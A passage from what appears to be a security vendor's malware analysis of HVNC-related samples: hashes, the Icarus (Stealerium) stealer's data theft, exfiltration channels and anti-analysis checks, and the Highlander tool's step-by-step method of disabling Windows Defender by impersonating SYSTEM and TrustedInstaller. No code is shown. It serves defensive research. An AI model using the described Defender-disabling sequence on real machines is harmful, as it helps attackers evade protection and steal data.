style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i 
class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sun Nov 27 01:42:33 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" 
style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div 
class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">712871412b0da86d7bc1f1601e1fa212<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; 
text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">14a59ee663cd6ff1b816a62e2078aa434cdf1da5<\/span><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_36997657\" class=\"td_class_36997657\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">sha256<\/td><td id=\"td_id_66951413\" class=\"td_class_66951413\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">6b4ea42c1de9777847d7b6f980976310abe46d2de9792045a6eba54b032b8520<\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_97969899\" class=\"td_class_97969899\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">ssdeep<\/td><td id=\"td_id_61574672\" class=\"td_class_61574672\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">49152:BNNm\/5XhG34AiROEw+W7SCmnVQjkQxBA8hA:nU11lw\/CFyA<\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Overview of the stealer<\/h4>\n<p>Icarus.exe is a stealer, functionally close to the StormKitty and Prynt Stealer samples discussed earlier, that collects a wide range of information:<\/p>\n<ul>\n<li>banking data;<\/li>\n<li>cryptocurrency data;<\/li>\n<li>browsing data (history, cookies, passwords, downloads) for the main browsers: Edge, Firefox, Chrome \/ Chromium;<\/li>\n<li>gaming accounts: Steam, Battlenet, Uplay, Minecraft;<\/li>\n<li>messaging data: Discord, Element, ICQ, Outlook, Pidgin, Signal, Skype, Telegram, Tox;<\/li>\n<li>system data: installed applications, Windows licence key, system information;<\/li>\n<li>saved Wi-Fi passwords;<\/li>\n<li>screenshots;<\/li>\n<li>keystrokes;<\/li>\n<li>VPN credentials (ProtonVPN, OpenVPN, NordVPN);<\/li>\n<li>theft of files selected by extension.<\/li>\n<\/ul>\n<p>When the sample is built, the operator can select which files and data are to be collected. 
This configuration is then stored in the binary.<\/p>\n<p>In this particular sample, the configured file extensions cover common files (Microsoft Office documents, password databases) as well as files specific to certain sectors, such as source code or business database files. The targeting is therefore very broad: it covers individuals as well as companies.<\/p>\n<p>A \"<em>PornService<\/em>\" feature even takes screenshots and webcam captures simultaneously when certain keywords are spotted by the keylogger. There is no need to list the keywords to understand that the end goal is <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/sextorsion-et-cyberattaques-vers-un-marketing-de-la-honte\/\">sextortion<\/a>.<\/p>\n<p>The collected data is then exfiltrated through several channels: Discord chats, file-sharing sites (gofile, anonfile) or Telegram channels.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414147\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 20: code formatting the data before the Icarus stealer sends it to Discord<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Self-protection mechanisms of the stealer<\/h4>\n<p>The binary carries several ways of protecting itself against detection by security products:<\/p>\n<ul>\n<li>self-destruction, triggered for example when the Discord server cannot be reached;<\/li>\n<li>sandbox and virtual machine detection;<\/li>\n<li>debugger detection;<\/li>\n<li>a check of the running processes for tools commonly used by analysts.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414152\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 21: blacklist of security software in the Icarus stealer code<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Probable origin of the stealer<\/h4>\n<p>Renamed Icarus in the samples we found, the PDB path left in the binary shows that it is Stealerium, or a variant of it, available as open source (github.com\/Stealerium\/Stealerium):<\/p>\n<p><code>H:\\HVNCICARUS\\Icarus\\Icarus - Nocrypt\\HVNC Source\\Stealerium-Build_2022.06.08_22-08\\Stub\\obj\\Debug\\Icarus.pdb<\/code><\/p>\n<p>Below is a comparison between the decompiled sample and the code in the Stealerium repository, where a strong resemblance can be seen:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414157\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 22: code comparison between the Icarus sample and the Stealerium repository<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Highlander<\/h3>\n<h4>Identity card<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_7\"\n     id='ninja_table_builder_414271'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_7\"\n     style=\"\n     max-height:900px;\n     max-width: 1160px;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414271\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px 
">
solid rgb(0, 0, 0);\">Type of file<\/td><td id=\"td_id_63752073\" class=\"td_class_63752073\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">PE<\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_85508872\" class=\"td_class_85508872\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">Language used<\/td><td id=\"td_id_67647307\" class=\"td_class_67647307\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">.NET<\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_88081221\" class=\"td_class_88081221\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">Compilation date<\/td><td id=\"td_id_23319849\" class=\"td_class_23319849\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">Sun Feb 27 23:06:01 2101 | Incoherent<\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_90964305\" class=\"td_class_90964305\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">Obfuscation<\/td><td id=\"td_id_85405762\" class=\"td_class_85405762\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">No<\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_22731821\" class=\"td_class_22731821\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">md5<\/td><td id=\"td_id_27089268\" class=\"td_class_27089268\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">b785943821261b267d3f3d686fc013e6<\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_74398198\" class=\"td_class_74398198\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">sha1<\/td><td id=\"td_id_81484118\" class=\"td_class_81484118\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">a2e4412c9e1cf33c668e786c2bdec35c2f86a688<\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_36997657\" class=\"td_class_36997657\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">sha256<\/td><td id=\"td_id_66951413\" class=\"td_class_66951413\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">a8361bd86b7859c0d93c8470975e9ffd20765c42ecb49491c029542213410a85<\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_97969899\" class=\"td_class_97969899\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">ssdeep<\/td><td id=\"td_id_61574672\" class=\"td_class_61574672\" style=\"padding: 10px; border: 1px solid rgb(0, 0, 0);\">192:6QUlf6ETyQ7H3QxX5ARunnf0HD7mZoPfYIqL0HjvFYx:TU4ET9b3QV5Tnn3KH1yINY<\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Overview<\/h4>\n<p>This tool, deployed by HiddenEyeZ HVNC, has a single purpose: disabling Windows Defender.<\/p>\n<p>Its logic is simple enough to be described in full:<\/p>\n<ul>\n<li>start the <code>TrustedInstaller<\/code> service: this step ensures that a process is running under the TrustedInstaller account;<\/li>\n<li>attempt to impersonate the <code>SYSTEM<\/code> account: the malware tries to open the token of the <code>Winlogon<\/code> process, which runs as SYSTEM, and to impersonate it as a first privilege elevation. Note that this operation requires privileges (in practice SeDebugPrivilege) that are only available to administrator accounts;<\/li>\n<li>attempt to impersonate the <code>TrustedInstaller<\/code> account: the malware repeats the same action with the <code>TrustedInstaller<\/code> process in order to run in the context of this technical account, which is the one used to manage Windows Defender (starting or stopping the service, replacing files, etc.);<\/li>\n<li>stop the Windows Defender service: the last step fulfils the tool's purpose by disabling Windows Defender, which improves the stealth of the rest of the attack. On recent Windows versions with Defender tamper protection enabled, a service stop of this kind is expected to be refused, a case the tool does not handle since it checks none of its steps (see below).<\/li>\n<\/ul>\n<p>Here is the implementation of the impersonation of the <code>TrustedInstaller<\/code> account.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414162\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 23: implementation of the TrustedInstaller impersonation in the Highlander tool<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]The tool looks more like a proof of concept than something with the level of quality needed for deployment during an attack:<\/p>\n<ul>\n<li>many debug strings are present;<\/li>\n<li>failures are never checked between the successive steps.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414167\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 24: Highlander code showing the missing checks on the success of each step<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Every action is executed even when the previous ones have failed, so the later ones fail as well.<\/p>\n<h3>AddStartupTask<\/h3>\n<h4>Identity card<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_8\"\n     id='ninja_table_builder_414270'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_8\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414270\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody 
class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" 
rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div 
id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Fri Jul 8 11:52:00 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span 
class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i 